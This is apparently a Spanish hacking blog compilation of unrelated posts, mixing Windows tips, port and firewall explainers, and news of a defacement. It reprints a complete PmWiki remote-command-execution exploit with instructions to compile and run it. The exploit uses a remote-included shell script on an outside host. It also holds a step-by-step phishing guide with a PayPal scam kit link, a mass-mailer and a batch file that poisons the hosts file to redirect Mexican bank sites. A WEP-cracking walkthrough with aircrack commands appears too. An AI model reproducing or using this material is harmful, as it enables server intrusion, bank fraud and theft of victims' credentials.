Hay muchos mas pero esos despues los pondre.

Acelerar el menu de inicio.

Pondremos un valor de cero para conseguir la mayor velocidad

Liberar memoria RAM. Despues de aver ejecutado aplicaciones multiples, que hagan uso intensivo de los recuersos del sistema habremos detectado que windows queda mucho mas lento. La razon es que las aplicaciones bloquean parte de la RAM que han utilizado, asi ocacionando la fragmentacion de memoria.

Ahora vamos a guardar nuestro archivo, Nos vamos a Archivo>Guardar como>


Asta aora no hay una fecha para el lanzamiento de Internet Explorer 8

*Los exploits php se distinguen de esta manera #!/usr/bin/php

*Nesecitamos un compilador (BamCompile)

Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://

Posteriormente usamos un exploit yo usare de ejemplo este:

#!/usr/bin/php -q -d short_open_tag=on
<?
print_r(’
——————————————————————————–
PmWiki <= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit
by rgod rgod @autistici.org
site: http://retrogod.altervista.org
dork: inurl:pmwiki.php +”Page last modified on” | PmWikiPhilosophy
——————————————————————————–
‘);
/*
works with register_globals=On
against PHP < 4.4.3, 5 <= PHP < 5.1.4
*/
if ($argc<5) {
print_r(’
——————————————————————————–
Usage: php ‘.$argv[0].’ host path http_loc cmd OPTIONS
host:      target server (ip/hostname)
path:      path to pmwiki
http_loc:  an http site with the code to include (without ending slash)
cmd:       a shell command
Options:
-p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php ‘.$argv[0].’ localhost /pmwiki/ http://somehost.com ls -la -P1.1.1.1:80
php ‘.$argv[0].’ localhost /pmwiki/ http://somehost.com ls -la -p81

Note:
prepare this code in http://somehost.com/scripts/stdconfig.php/index.html :
<?php
error_reporting(0);set_time_limit(0);echo “my_delim”;
passthru($_SERVER[”HTTP_CLIENT_IP”]);die;
?>
——————————————————————————–
‘);
die;
}

error_reporting(0);
ini_set(”max_execution_time”,0);
ini_set(”default_socket_timeout”,5);

function quick_dump($string)
{
$result=”;$exa=”;$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=”  .”;}
else
{$result.=”  “.$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=” “.dechex(ord($string[$i]));}
else
{$exa.=” 0″.dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.=”\r\n”; $exa.=”\r\n”;}
}
return $exa.”\r\n”.$result;
}
$proxy_regex = ‘(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy==”) {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo ‘No response from ‘.$host.’:’.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo ‘Not a valid proxy…’;die;
}
$parts=explode(’:',$proxy);
echo “Connecting to “.$parts[0].”:”.$parts[1].” proxy…\r\n”;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo ‘No response from proxy…’;die;
}
}
fputs($ock,$packet);
if ($proxy==”) {
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html=”;
while ((!feof($ock)) or (!eregi(chr(0×0d).chr(0×0a).chr(0×0d).chr(0×0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo “\r\n”.$html;
}

$host=$argv[1];
$path=$argv[2];
$http_loc=$argv[3];
$cmd=”";
$port=80;
$proxy=”";

for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>”-p”) and ($temp<>”-P”)) {$cmd.=” “.$argv[$i];}
if ($temp==”-p”)
{
$port=str_replace(”-p”,”",$argv[$i]);
}
if ($temp==”-P”)
{
$proxy=str_replace(”-P”,”",$argv[$i]);
}
}
if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/')) {echo ‘Error… check the path!’; die;}
if ($proxy==”) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}

$data =”—————————–7d529a1d23092a\r\n”;
$data.=”Content-Disposition: form-data; name=\”FarmD\”;\r\n\r\n”;
$data.=”$http_loc\r\n”;
$data.=”—————————–7d529a1d23092a\r\n”;
$data.=”Content-Disposition: form-data; name=\”-1778478215\”;\r\n\r\n”;
$data.=”1\r\n”;
$data.=”—————————–7d529a1d23092a\r\n”;
$data.=”Content-Disposition: form-data; name=\”-1304181425\”;\r\n\r\n”;
$data.=”1\r\n”;
$data.=”—————————–7d529a1d23092a–\r\n”;
$packet =”POST “.$p.”pmwiki.php?n=PmWiki.BasicEditing?action=edit HTTP/1.0\r\n”;
$packet.=”CLIENT-IP: “.$cmd.”\r\n”;
$packet.=”Content-Type: multipart/form-data; boundary=—————————7d529a1d23092a\r\n”;
$packet.=”Content-Length: “.strlen($data).”\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
$packet.=$data;
sendpacketii($packet);
if (strstr($html,”my_delim”)){
echo “exploit succeeded…\n”;$temp=explode(”my_delim”,$html);die($temp[1]);
}
elseif (strstr($html,”failed to open stream”))
{echo “*** adjust path… ***\n”;die($html);}
else
{echo “exploit failed…”;}
?>

El codigo que les acabo de dejar lo copiamos en el bloc de notas y lo guardamos con una extension .php

Ahora lo compilamos: tenemos que teclear:

bamcompile exploit.php exploit.exe

siendo exploit.php el codigo que les acabo de dejar,

Ahora nos damos cuenta que se ha creado un archivo llamado exploit.exe que se encuentra en la bamcompile1.21

Le damos doble click al archivo exploit.exe y listo ahi vienen las instrucciones de como usarlo

SaLuDoS

St4t1k

Un puerto abierto no es un objeto autónomo, y no debería ser considerado como algo que puede ser destruido al cerrarlo. Si un puerto está abierto en tu ordenador, significa que hay un programa activo usando dicho número de puerto para comunicarse con otros ordenadores en la web. Un puerto no es abierto por el sistema operativo, es abierto por un programa específico queriendo usarlo.

Para cerrar un puerto, usualmente solo es necesario cerrar el programa ó servicio que mantiene dicho puerto abierto. En algunos puertos basta con decirle a un programa o servicio que el puerto no debe estar abierto. Un buen ejemplo son los Servicios de Información de Internet de Microsoft, en Windows 2000 y Windows XP. Si son instalados, abren tres puertos automáticamente: 21, 25 y 80. El puerto 21 es el servidor FTP; el puerto 25 el servidor SMTP (servidor de email); y el puerto 80 el servidor web para HTTP.

El servidor FTP habilita a otros usuarios de internet a descargar archivos compartidos desde tu sistema. Pueden también subir archivos a tu sistema, si eliges permitirlo. El servidor SMTP es usado para enviar emails directamente a la casilla de correo del recipiente sin usar un servidor de correo externo. El servidor de correo te permite correr un sitio web en tu PC. Pero esto es solo alcanzable en tu dirección de IP. Si deseas hacer esto accesible al público, necesitas un nombre de dominio que redireccione a una dirección de IP estática.

Sin embargo, si no necesitas todos estos servidores, simplemente ciérralos y los puertos serán cerrados automáticamente. Abre el administrador de servicios en el panel de control - administrador de tareas. Servicios y programas que son abiertos automáticamente cuando se inicia el sistema sin ninguna ventana visible. Estos trabajan tras bambalinas (en el fondo).

Busca “servicio de publicación WWW” en la lista y haz click en el icono Detener Servicio en la parte superior. El puerto 80 no estará más en uso, estará cerrado. Puedes hacer lo mismo con el “servicio de publicación FTP” y el “protocolo simple de transporte de Correo (SMTP)”.

Sin embargo, no es siempre sencillo el averiguar porque un puerto está abierto. Un ejemplo es el puerto 5000 el cual es abierto de forma predeterminada por Windows ME y XP. Para esto, no hay servicio que puedas apagar, que cierre el puerto. Para cerrar este puerto, es necesario desinstalar cierto componente del sistema. El puerto 5000 es usado para “plug and play” con dispositivos de redes. Si cierras este puerto, la red “plug and play” (conecta y juega) no estará más disponible.
Cortafuegos (Firewalls)

Aunque un puerto no pueda ser bloqueado cerrando un programa ó servicio, hay otras opciones para bloquear las comunicaciones a dicho puerto. Los Cortafuegos (firewalls) pueden prevenir conexiones en puertos específicos. Trabajan según el principio en que los paquetes de datos que usan un puerto en particular en una red son filtrados. Sin embargo, los cortafuegos solo proveen protección pasiva. Esto significa que tu puedes tener un troyano instalado en tu ordenador, pero no se puede conectar al atacante a causa del cortafuegos el cual está bloqueando la conexión.

Hay diferentes conceptos de cortafuegos. Por un lado hay Cortafuegos de Escritorio como Zonealarm ó Tiny Personal Firewall, los cuales son instalados de forma local en la PC que protegen. Estos cortafuegos se localizan sobre la capa del driver de la red del sistema operativo, y previenen conexiones desde ó hacia puertos específicos bloqueados. Pero aquí también hay un obstáculo. No se puede prevenir que programas ó troyanos, los cuales no usan el driver de la red del sistema operativo, hagan una conexión hacia afuera del ordenador. Si un atacante puede instalar un troyano con su propio driver de red en tu PC, un cortafuegos de escritorio no es de gran ayuda.

Una técnica más segura es instalar un cortafuegos en un segundo ordenador. Usualmente en una red entera de ordenadores solo se pueden enviar datos hacia internet a través de un “servidor cortafuegos”. Los ordenadores en la red no tienen una conexión directa a internet. Todos los datos son transmitidos por el cortafuegos, y pueden entonces ser bloqueados cuando sea necesario. La mayoría de estos cortafuegos también son capaces de analizar paquetes de datos. Entonces, por ejemplo, si un email inofensivo es transferido, el cortafuegos puede chequear que ahí no hay un virus adjuntos al email, y filtra el adjunto antes de enviarlo al PC destino. En general, los buenos cortafuegos tienden a ser bastante caros y usualmente requieren hardware especial.

Material:
Scam
Hacked Host
Mail list
Mailer Inbox

Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html

Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..

Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno
http://rapidshare.com/files/76390702/mailerpriv8.php

Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam
(que es lo que se escribe para engañar a la victima)
y si tenemos una letter para pharming nos dedicamos a crear uno

Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)

Ejemplo en batch

@echo off
echo ipdetuhost www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.esmas.com >> %windir%\system32\drivers\etc\hosts
echo ipdetuhost www.hotmail.com >> %windir%\system32\drivers\etc\hosts
exit

Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake

Solo es teoria en general pero poco a poco AHhahAH

–StATiK–

lo que tratare de explicar es, como obtener las claves de redes inalambricas, para este caso me basare en romper una clave de encriptacion wep a 64 bits, recomoiendo que lean un poco sobre tipo de encriptaciones de redes wifi para saber mejor cuando van a atacar una red de este tipo.

Nota: En las imagenes se puede apreciar que las edite para no mostrar las direcciones Mac y a si evitarme problemas
Vamos a ver como podemos obtener claves de redes inalambricas, para este ejemplo me basare en hackear mi propia red.

Material usado:
cd wifislax 2.0
tarjeta inalambrica: Ather0s
tamaño de memoria raam: 256

Bien, lo primero que tenemos que hacer una ves ya estado en nuestra live cd es poner nuestra tareta en modo monitor, para eso vamos a:

Menu>Wifislax>Asistencia Chipse>Asistencia Chipset Ather0s> Crear interface (Modo Monitor)

Bien, ahora lo siguiente es ejecutar Kismet para poder ver por que canal viaa la red victima, la Mac y el tipo de encriptacion.

Menu>Wifislax>Herramientas Wireless>Monitorizacion wireless (Kismet)

en driver selecciono rt2500 y le doy aplicar.

cuando inicie la pantalla de kismet tecleamos la tecla de <space> y despues tecleamos la teltra “s” 2 veces

tecleamos enter sobre la red vicitima:

y anotamos los datos que nos interesan:

ssd, bssid, chanel y Encrypt:

podemos observar en la imagen que la ssid (Nombre de la red) es Th3r0rn, la bssid es la MAC, Tambien podemos ver que el canal por el que viaja la red es el 6 y tambien que el tipo de encriptacion es WEP.

Una ves que tenemos esos datos ya anotados, salimos presionando la tecla ” Q” despues sobre la misma red victima tecleamos la letra “C” esto para ver las maquinas conectadas a la red mediante wireless claro

Bien ahora cerramos la ventana de Kismet y ejecutamos una nueva shell, ya que tenemos nuestra shell lo siguiente sera ejecutar airodump, para ello lo ejecutaremos a si:

airodump ath0 th3r0rn 6

explico la sintaxis: donde airodump hacemos la llamada al programa, donde ath0 es nuestra interfaz wireless, donde th3r0rn es el nombre del archivo que se genrara en formato .cap o .ivs el nombre puedes poner el que quieras, y en donde 6 es el canal por el cual airodump va a capturar el trafico filtrando todos los demás canales ya que como vimos antes en la pantalla del kisme, nuestra red victima viaja por el canal 6.

ahora lo que tenemos que hacer es asociarnos a la red para poder inyectar trafico. para esto ejecutamos aireplay, la sintaxis es:

aireplay -1 0 -e ESSID -a BSSID -h STACION ath0

por lo cual:

ejecutaremos:

aireplay-ng -1 0 -e Th3r0rn -a aqui la MAC -h aqui la stacion ath0

como resultado vemos que nos asociamos a la red de manera correcta:

ahora lo siguiente es acelerar el trafico en la red, para inyectaremos trafico con aireplay:

su sintaxis es:

aireplay-ng -3 -b MAC -h STATION ath0

recordemos que donde ath0 es nuestra interfaz, entonces ejecutamos y solo nos sentamos a esperar a que inyecte el el trafico necesario para poder obtener nuestra clave wep : -)

ya que tenemos mas 250mil iv’s capturados (necesarios para romper una wep de 64 bits, podemos ejecutar aircrack para poder obtener la clave.

su sintaxis:

aircrack archivo.cap

observemos la red vicitma tiene 303404 IV’s

y que su numero de identificador es “1″

por lo cual tecleamos 1 y damos enter

y Bingooo¡

Tenemos la nuestra clave:

en la imagen donde tengo aircrack y me muestra q son 303404 IV’s se aprecia que use 2 archivos.cap esto es por que tuve que hacer algo por lo cual detuve la captura de trafico y cuando termine capture lo que me hacia falta

por supuesto que el numero de datos a capturar para poder obtener la clave de la red dependerá de que tipo de encriptacion en que esta se encuentre.

disculpen los errores ortográficos a si como de redacción.
Nota: Pueden copiar el tutorial siempre y cuando usen el nombre del autor. saludos
Contaco: franzhackerss.com y mi blog Imgeek
th3r0rn
Nota: Este fue solo escrito con fines educativos para aprender y protegerse de este tipo de ataques cual quier aclarasion o porblemas legales pueden contactar con el administrador de este sitio

Bueno en este tutorial uso una herramienta llamada teleport para guardar sitios web.

Con todo e imagenes,directorios etc.

(Con esto tambien pueden hacer scam’s o fakes como le llamen.)

Es facil, para eso les deje un videotutorial hecho por mi, esta algo pesadito el video ya que lo edite.

Espero les guste, fue dedicado a www.blogdelhacker.com

Descarga del video: VIDEO

Bueno hoy en la mañana esta viendo noticias asta que me entere de que un hacker, se manifesto en la web de la Camara de diputados.

El hacker aseguro tener 14 años de edad y dejo un mensaje de protesta de la situacion politica del pais.

El responsable de sistemas de la Cámara, Miguel Vega, explicó a la prensa que la infiltración duró aproximadamente una hora y agregó que esta ha sido la primera ocasión en que ocurre una violación a la página electrónica de esta institución.

La pagina web, ha sido victima de miles de atakes,asta esta vez.

Y acontinuacion su manifiesto:

“Buenas (tardes) tengan todos ustedes. Mi nick es Axuz, tengo 14 años de edad y tengo los ojos bien abiertos a lo que hace el Gobierno”, dijo el hacker en su mensaje.

“No ha cambio nada, sigue habiendo pobreza, corrupción, violencia y destrucción, sólo quiero ver si logro hacer conciencia en todos ustedes políticos, no quiero ser sancionado con nada, sólo quiero manifestarme libremente, que es la única manera que van a escuchar a un joven de 14 años… no quiero problemas”, agregó el mensaje del intruso.

El responsable de Sistemas explicó que esta intromisión se produjo hoy en una red no clasificada en uno de los accesos del menú de “información de diputados” por más de una hora, lo que causó una avería en el sistema.

Bueno mi opinion es:

Que ese niño (Hacker) quiso abrirles los ojos a los diputados, pero lo que mas coraje me da esque ellos se fijen en que violaron su seguridad y no analizar la forma de exprecion de su mensaje, el niño claramente aclaro que el no quizo causar daño.

En fin…

un saludo rUsH

Bueno esta vez les voy a hablar de phishing:

El phishing en la informatica es un delito, que es algo parecido a los scam’s, que usan los carder’s, osea el phishing es una manera de estafa, el estafador es un phisher, lo que hace este phisher, es usar ingenieria social, para sacar informacion confiencial, este phisher, se hace pasar como por algun ingeniero de alguna empresa, o alguna persona importante.

Los phisher’s los metodos mas comunes que usan son: Correo electronico, Paginas web.

Hay algunos otros, como sistemas de mensajeria instantanea, o por llamadas telefonoicas.

El phishing es un delito, ya que muchas personas han caido en esos fraudes.

Aora continuamos con la historia de phishing:

Origen de la palabra

El término phishing proviene de la palabra en inglés “fishing” (pesca) haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher . También se dice que el término “phishing” es la contracción de “password harvesting fishing” (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo.

Son posibles traducciones apropiadas en español los términos anzuelo o estafa electrónica.

La primera mención del término phishing data de enero de 1996 en grupo de noticias de hackers alt.2600 , aunque el término apareció tempranamente en la edición impresa del boletín de noticias hacker “2600 Magazine” . El término phishing fue adoptado por crackers que intentaban “pescar” cuentas de miembros de AOL; ph es comúnmente utilizado por hackers para sustituir la f, como raíz de la antigua forma de hacking conocida como “phone phreaking”.

Bueno un ejemplo de phishing es:

Las paginas web, esas famosas que te dicen, mira quien te admite y quien no te admite, algunas de esas web’s son falsas y tan solo lo que hacen es llamar la atencion y luego cuando te registrar o inicias secion, te roban los datos de tu cuenta.

Tambien existen tecnicas antiphishing:

Esto en realidad es algo personal, las tecnicas, no creas que es algo relacionado con softwares ni nada por el estilo, solo es que no te dejes engañar, antes de soltar informacion investiga por otros medios, yo lo que recomiendo es no dar informacion a cualquier persona.

Ya que cuando confiamos en alguien, damos a conocer alguna informacion importante, si que lo notes.

Esto va relacionado con la ingenieria social. solo mi consejo es que no se dejen llevar por las apariencias.

Text by rUsH.

Historia sacada de : wikipedia

A cotninuación podrás ver un tutorial completo para prevenirse de los virus y las herramientas necesarias para tal acción espero lo lean.

Extraido del tutorial: 

JUSTIFICACIÓN
En definitiva, sea cual fuere el motivo por el cual se siguen produciendo virus, se
debe destacar que su existencia no ha sido sólo perjuicios: gracias a ellos, mucha
gente a tomado conciencia de qué es lo que tiene y cómo protegerlo.

OBJETIVOS

DESCARGAR TUTORIAL

CONCLUSIÓN
Este trabajo esta hecho con el fin de afianzar nuestro conocimiento acerca de lo que es en
realidad un virus informatico su impacto a nivel personal y de sistemas teniendo en cuanta
la importancia que tienen lo datos que se almacenan y el correcto manejo de las opciones
informáticas que nos pueden ayudar a salvar parcial o totalmente de los datos que se
encuentren en riesgo a causas de algunas de estas aplicaciones que ponen en peligro
cualquier tipo de sistema protegido, si hablamos de virus nuevos, que por su tamaño tan
imperceptible y las tantas maneras que encuentra para su propagación y reproducción
pueden llegar y hacernos pasar un mal rato y obtener perdidas irrecuperables.

Extraido de: ReadHacked.COM